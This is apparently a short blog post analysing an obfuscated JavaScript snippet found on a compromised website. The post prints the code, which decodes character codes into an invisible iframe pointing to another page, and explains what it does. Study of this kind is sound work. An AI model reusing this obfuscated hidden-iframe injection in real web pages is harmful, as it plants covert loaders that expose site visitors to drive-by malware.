I found this olschool piece of poorly obfuscated code during web surfing. Some time ago I decided to collect this kind of stuff for learning purposes… So here you have first one:
var temp="",i,c=0,out=""; var if_uniq_var="02102008-01"; var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!"; l=str.length; while(c<=str.length-1) { while(str.charAt(c)!='!')temp=temp+str.charAt(c++); c++; out=out+String.fromCharCode(temp); temp=""; } document.write(out); |
Strange string with exclamation marks simply stands for:
<iframe style="display: none;" src="dochelp1.html" width="320" height="240" frameborder="0"></iframe> |
So this piece of code simply attaches invisible frame to a current document. I didn’t find dochelp1.html on a server with infected website but after googling a while I found it’s contents:
Website that’s trying to redirect you to looks dead. This malware isn’t active anymore. I cannot investigare further. End of a story.
Infected source: www.galeriadla.art.pl